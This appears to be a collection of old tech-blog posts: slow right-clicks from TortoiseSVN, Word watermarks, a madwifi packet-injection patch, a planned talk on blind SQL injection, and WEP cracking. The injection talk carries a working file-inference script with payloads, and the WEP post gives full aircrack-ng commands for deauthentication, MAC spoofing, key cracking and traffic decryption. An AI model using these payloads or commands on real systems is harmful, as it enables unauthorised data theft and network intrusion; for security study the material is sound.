
Windows and slow right clicks


Ever since I installed TortoiseSVN I have noticed that right-clicks on my Windows XP SP2 machine had become terribly slow. It seems that Tortoise performs a whole lot of caching: every time you right-click, all the cache entries are browsed and updates are sought. Although the interface provides ways to disable this overlay caching, it seemed to me that the caching was being performed regardless. I had to uninstall the client to restore the sanity of my right-clicks. I guess software designers should make design decisions such that UI responsiveness is not compromised by Windows shell extensions.


Clubhack 2008


Jay Kelath and I will be presenting at ClubHack 2008. Our topic is “Snake in the Eagle’s Shadow: Blind SQL Injection”. It is about using blind SQL injection on Oracle and MSSQL (and possibly MySQL) to get the contents of remote databases, and about combining out-of-band mechanisms on Oracle with blind SQL injection to pilfer database information.
I’ve also written a tool that I’ll be presenting with Jay to show how blind SQL injection can be exploited to remotely download files. The technique I’m presenting differs from the time-delay techniques presented in the past, which rely on WAITFOR DELAY statements. Traditionally, WAITFOR DELAY has been used to download database contents, as shown by tools such as Absinthe, SQLBrute and Blind SQL Brute Forcer. I instead automate “virtual” file downloading on MSSQL Server: the file is loaded into a table with BULK INSERT and its contents are then inferred through the injection. This needs no firewall allowances, because the database server never has to open a connection to you: if you can “infer” every byte of a file, you do not need to download it over a TCP connection, you can re-create the file yourself, since you already know every byte of it. The only limitation is that the data rate is pretty slow. However, since the technique does not rely on time delays, it is still faster than time-delay techniques.
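The inference loop described above, as an added example that is not the author's ClubHack tool and not code from the original post: a boolean-based oracle (the page behaves one way when the injected condition is true and another way when it is false) is asked "is byte N of the staged file greater than X?" and each byte is pinned down by binary search in eight requests, so the whole file is rebuilt locally without the database ever connecting back. The table name `inj_f`, the staged file path and the vulnerable query shape are assumptions; the BULK INSERT WITH options that make a whole file land in a single row are not shown on the page and are only quoted as a template here. The target is a constructed in-memory stand-in, so the script runs offline.

```python
# Added example (not the author's tool): boolean-based blind inference of a file that
# BULK INSERT has copied into a table, reconstructed byte by byte with no connection
# back from the database server. Table name, path and query shape are assumptions.
import re
from typing import Callable

# Assumed staging statements (hypothetical table inj_f and file path). The WITH options
# that put the whole file into one row are not shown on the page; not executed here.
STAGE_SQL = (
    "CREATE TABLE inj_f (data VARCHAR(8000)); "
    "BULK INSERT inj_f FROM 'C:\\inetpub\\wwwroot\\web.config'"
)


def length_probe(n: int) -> str:
    """Injected condition: is the staged file longer than n bytes?"""
    return f"' AND (SELECT DATALENGTH(data) FROM inj_f) > {n} --"


def byte_probe(pos: int, n: int) -> str:
    """Injected condition: is byte pos (1-based, as SUBSTRING counts) greater than n?"""
    return f"' AND (SELECT ASCII(SUBSTRING(data,{pos},1)) FROM inj_f) > {n} --"


def infer_number(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Binary search for a value in [lo, hi] using only a 'value > n' oracle."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_file(oracle: Callable[[str], bool], max_len: int = 4096) -> bytes:
    """Recreate the staged file: one length search, then 8 requests per byte (0..255)."""
    length = infer_number(lambda n: oracle(length_probe(n)), 0, max_len)
    out = bytearray()
    for pos in range(1, length + 1):
        out.append(infer_number(lambda n, p=pos: oracle(byte_probe(p, n)), 0, 255))
    return bytes(out)


class FakeTarget:
    """Constructed stand-in for the vulnerable page. It 'executes' the injected
    condition against an in-memory copy of the file and answers true/false, the way
    a real page does by returning either the normal result or an empty one."""

    _LEN = re.compile(r"DATALENGTH\(data\) FROM inj_f\) > (\d+)")
    _BYTE = re.compile(r"SUBSTRING\(data,(\d+),1\)\) FROM inj_f\) > (\d+)")

    def __init__(self, file_bytes: bytes) -> None:
        self.file = file_bytes
        self.requests = 0  # how many HTTP requests the inference would have cost

    def page_is_normal(self, payload: str) -> bool:
        self.requests += 1
        query = f"SELECT name FROM products WHERE id = '{payload}'"  # assumed vulnerable shape
        m = self._LEN.search(query)
        if m:
            return len(self.file) > int(m.group(1))
        m = self._BYTE.search(query)
        if m:
            pos, n = int(m.group(1)), int(m.group(2))
            return pos <= len(self.file) and self.file[pos - 1] > n
        raise ValueError("unrecognised probe")


if __name__ == "__main__":
    # Constructed sample file content standing in for what BULK INSERT staged.
    target = FakeTarget(b"<connectionStrings>...</connectionStrings>")
    recovered = infer_file(target.page_is_normal)
    print(recovered.decode(), "in", target.requests, "requests")
```

The cost is what makes the data rate slow: 8 requests per byte plus a short length search, but every request returns immediately, which is why this is still faster than a WAITFOR DELAY oracle that must sleep on each probe.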


MS Word and Printed Watermarks – Stupidity


Using watermarks in Word documents looks really cool, but problems occur when the documents become too big: the document becomes exceedingly slow to react to scrolling, and Adobe PDF conversion is an even bigger problem.
Removing the watermark is simple enough: Format -> Background -> Printed Watermark, then click “No watermark” and you are golden (or you should be golden).
I’ve observed that the watermark often does not get removed when the document has too many sections.
In such cases: go to View -> Header and Footer and click “Show/Hide Document Text”.
You should see that all your text has disappeared except the watermark. Click on the watermark and you should be able to select it like a floating image. Press the Delete key and lo and behold, the watermark is gone.
This took me a while to figure out and it was quite frustrating. I hope this post helps someone!


Atheros Madwifi-ng patch Revision 3876


Copy and paste the text shown below into a file called madwifing-r3876.patch (keep the leading whitespace of the context lines intact, since patch needs them to match the source exactly).


--- madwifi/ath/if_ath.c 2008-11-07 01:05:07.000000000 -0500
+++ madwifi-patched/ath/if_ath.c 2008-11-06 17:56:59.000000000 -0500
@@ -3000,6 +3000,7 @@
ath_tx_startraw(struct net_device *dev, struct ath_buf *bf, struct sk_buff *skb)
{
struct ath_softc *sc = dev->priv;
+ struct ieee80211com *ic = &sc->sc_ic;
struct ath_hal *ah = sc->sc_ah;
struct ieee80211_phy_params *ph = &(SKB_CB(skb)->phy);
const HAL_RATE_TABLE *rt;
@@ -3012,7 +3013,8 @@
struct ieee80211_frame *wh;

wh = (struct ieee80211_frame *)skb->data;
- try0 = ph->try[0];
+ //try0 = ph->try[0];
+ try0 = (ic->ic_opmode == IEEE80211_M_MONITOR) ? 1 : ph->try[0];
rt = sc->sc_currates;
txrate = dot11_to_ratecode(sc, rt, ph->rate[0]);
power = ph->power > 60 ? 60 : ph->power;
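Review bot: the commented-out `//try0 = ph->try[0];` left above the new assignment is dead code and should be deleted, since the diff itself records the old line; and as this is kernel C, the `//` comment style should not be introduced at all. Forcing `try0 = 1` for every frame sent in monitor mode also overrides the retry count the injector asked for through `ph->try[0]`, including for unicast frames the third hunk still expects an ACK on; if that is intended, a one-line comment saying why belongs next to the ternary.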
@@ -3036,7 +3038,8 @@
rt = sc->sc_currates;
KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode));

- if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+ //if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+ if (IEEE80211_IS_MULTICAST(wh->i_addr1) || ((ic->ic_opmode == IEEE80211_M_MONITOR) && (skb->data[1]&3) != 0x01) ) {
flags |= HAL_TXDESC_NOACK; /* no ack on broad/multicast */
sc->sc_stats.ast_tx_noack++;
try0 = 1;
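Review bot: `(skb->data[1]&3) != 0x01` reads the ToDS/FromDS bits of the frame-control field through a raw byte index and a magic number although `wh` already points at the same header; write it as `(wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) != IEEE80211_FC1_DIR_TODS` using the net80211 constants, and drop the commented-out old `if` line. The new behaviour, that in monitor mode every injected frame except ToDS frames goes out with NOACK and a single try, also makes the existing `/* no ack on broad/multicast */` comment inaccurate, so it should be updated in the same hunk.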

Check out the madwifi driver as follows:


sudo ifconfig ath0 down
sudo ifconfig wifi0 down
svn -r 3876 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng
cd madwifi-ng
patch -Np1 -i ../madwifing-r3876.patch
sudo ./scripts/madwifi-unload
make
sudo make install
sudo depmod -ae
sudo modprobe ath_pci

These instructions are similar to the ones written here (for a different revision):
http://www.aircrack-ng.org/doku.php?id=madwifi-ng


WEP Cracking


To crack the WEP key of an AP that is using WEP, perform the following steps:

Start capturing packets first (airodump-ng writes them to <CAPTUREFILE>-01.cap):
sudo airodump-ng --bssid <APMAC> -w <CAPTUREFILE> --channel <CHANNELNUM> <IFACE>

Start ARP request replay (aireplay-ng waits for an ARP request and re-injects it so the AP generates fresh IVs):
sudo aireplay-ng --arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets (a re-associating client usually sends the ARP request that the replay attack is waiting for):
sudo aireplay-ng --deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fake authentication packets (-h is the MAC your card injects with; reusing an already associated client's MAC gets past MAC filtering):
sudo aireplay-ng --fakeauth 5 -e <ESSID> -a <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Cracking WEP (-n is the key length in bits, 64 or 128):
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>-01.cap

The fudge factor (-f) controls how far aircrack-ng brute-forces beyond the most-voted candidates for each key byte; the default is 2 for 104-bit and 5 for 40-bit keys, and a higher value tries more candidates at the cost of time. I am not exactly sure of its cryptographic significance; however, it may make the difference between cracking a WEP key and not.

Sometimes the AP has no clients connected to it. In that case, follow the instructions in the aircrack-ng tutorial “How to crack WEP with no clients”.

Once the WEP key is obtained, use airdecap-ng to decrypt the capture (-w takes the key in hex; the decrypted packets are written to a -dec.cap file next to the input):
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap
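What airdecap-ng does with the recovered key, and why the ARP replay step above matters, as an added example that is not part of the original post and not aircrack-ng code: WEP encrypts each frame with RC4 keyed by the 3-byte per-frame IV prepended to the shared 40-bit or 104-bit key (the -n 64 / -n 128 choice above), and appends a CRC-32 integrity value (ICV). Decrypting a frame body and checking the ICV is all airdecap-ng has to do once the key is known. The second function shows the weakness the attack feeds on: two frames that reuse an IV share a keystream, so XORing the ciphertexts yields the XOR of the plaintexts without any key. The key, IV and payloads below are constructed sample values.

```python
# Added example (not from the original post, not aircrack-ng code): WEP frame-body
# encryption/decryption with ICV check, plus the keystream-reuse leak.
import struct
import zlib
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR the data with the generated keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP ICV: little-endian CRC-32 over the plaintext payload."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes, key_id: int = 0) -> bytes:
    """Frame body layout: IV(3) | key-id byte | RC4(IV || key, payload || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)  # 40-bit (-n 64) or 104-bit (-n 128) key
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, payload + icv(payload))


def wep_decrypt(key: bytes, body: bytes) -> Optional[bytes]:
    """Decrypt one frame body; return the payload, or None when the ICV fails
    (wrong key or corrupted frame). The key-id byte is read but not used here,
    since this example only carries a single key."""
    iv, ciphertext = body[:3], body[4:]
    plain = rc4(iv + key, ciphertext)
    payload, tag = plain[:-4], plain[-4:]
    return payload if icv(payload) == tag else None


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def iv_reuse_leak(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames under the same IV share one keystream: XOR of the ciphertexts
    cancels it and leaves p1 XOR p2, which an attacker gets without the key.
    Collecting many IVs (the ARP replay step) is what exposes the key itself."""
    c1 = wep_encrypt(key, iv, p1)[4:]
    c2 = wep_encrypt(key, iv, p2)[4:]
    n = min(len(p1), len(p2))
    return xor(c1[:n], c2[:n])


if __name__ == "__main__":
    KEY = bytes.fromhex("0102030405")  # constructed 40-bit key
    IV = b"\x01\x02\x03"               # constructed IV
    body = wep_encrypt(KEY, IV, b"hello wep")
    print(body.hex())
    print(wep_decrypt(KEY, body))
    print(wep_decrypt(bytes.fromhex("0a0b0c0d0e"), body))  # wrong key: ICV fails
```

On a real capture airdecap-ng applies this per frame to every data frame of the BSSID, dropping the IV/key-id header and the ICV, which is why the -dec.cap file is readable by tcpdump as ordinary 802.11 data.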